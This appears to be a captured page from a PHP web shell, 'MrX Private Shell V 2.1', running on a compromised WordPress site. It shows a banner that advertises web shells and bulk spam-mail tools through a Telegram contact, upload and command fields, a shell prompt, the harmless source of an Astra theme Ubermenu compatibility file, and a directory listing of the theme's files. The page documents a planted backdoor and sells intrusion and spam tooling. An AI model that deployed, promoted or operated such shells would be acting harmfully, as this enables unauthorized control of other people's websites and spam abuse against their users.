__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * Ubermenu Compatibility File.
 *
 * @link https://Ubermenu.me/
 * @since  1.1.7
 *
 * @package Astra
 */

// If plugin - 'Ubermenu' not exist then return.
if ( ! class_exists( 'UberMenu' ) ) {
	return;
}

/**
 * Astra Ubermenu Compatibility
 */
if ( ! class_exists( 'Astra_Ubermeu' ) ) {

	/**
	 * Astra Ubermenu Compatibility
	 *
	 * @since 1.0.0
	 */
	class Astra_Ubermeu {
		/**
		 * Member Variable
		 *
		 * @var object instance
		 */
		private static $instance;

		/**
		 * Initiator
		 *
		 * @since  1.1.7
		 */
		public static function get_instance() {
			if ( ! isset( self::$instance ) ) {
				self::$instance = new self();
			}
			return self::$instance;
		}

		/**
		 * Constructor
		 *
		 * @since  1.1.7
		 */
		public function __construct() {
			add_filter( 'astra_enable_mobile_menu_buttons', array( $this, 'disable_primary_menu_toggle' ), 30 );
		}

		/**
		 * Disable the Mobile Menu toggles from Astra if Uber Menu is used.
		 *
		 * @since  1.1.7
		 * @param  bool $status Status if the mobile menu toggels are enaled or disaled.
		 * @return bool         False If ubermenu is configured on this location. Unchanged if it is not configured.
		 */
		public function disable_primary_menu_toggle( $status ) {

			// Don't overrde anythign if ubermenu's function is not present.
			if ( ! function_exists( 'ubermenu_get_menu_instance_by_theme_location' ) ) {
				return $status;
			}

			$ubermenu_auto_config = ubermenu_get_menu_instance_by_theme_location( 'primary' );

			// If ubermenu's auto configuration is not used here, don't override the filter.
			if ( '' === $ubermenu_auto_config || false === $ubermenu_auto_config ) {
				return $status;
			}

			return false;
		}

	}

}

/**
 * Kicking this off by calling 'get_instance()' method
 */
Astra_Ubermeu::get_instance();

Filemanager

Name Type Size Permission Actions
edd Folder 0750
learndash Folder 0750
lifterlms Folder 0750
starter-content Folder 0750
surecart Folder 0750
woocommerce Folder 0750
class-astra-amp.php File 47.12 KB 0640
class-astra-bb-ultimate-addon.php File 11.06 KB 0640
class-astra-beaver-builder.php File 5.63 KB 0640
class-astra-beaver-themer.php File 11.29 KB 0640
class-astra-bne-flyout.php File 1.14 KB 0640
class-astra-contact-form-7.php File 1.29 KB 0640
class-astra-divi-builder.php File 1.12 KB 0640
class-astra-elementor-pro.php File 17.79 KB 0640
class-astra-elementor.php File 17.26 KB 0640
class-astra-gravity-forms.php File 1.31 KB 0640
class-astra-gutenberg.php File 6.21 KB 0640
class-astra-jetpack.php File 1.48 KB 0640
class-astra-site-origin.php File 1.16 KB 0640
class-astra-starter-content.php File 6.44 KB 0640
class-astra-ubermeu.php File 1.77 KB 0640
class-astra-visual-composer.php File 3.39 KB 0640
class-astra-web-stories.php File 2.35 KB 0640
class-astra-yoast-seo.php File 658 B 0640
index.php File 111 B 0640
Filemanager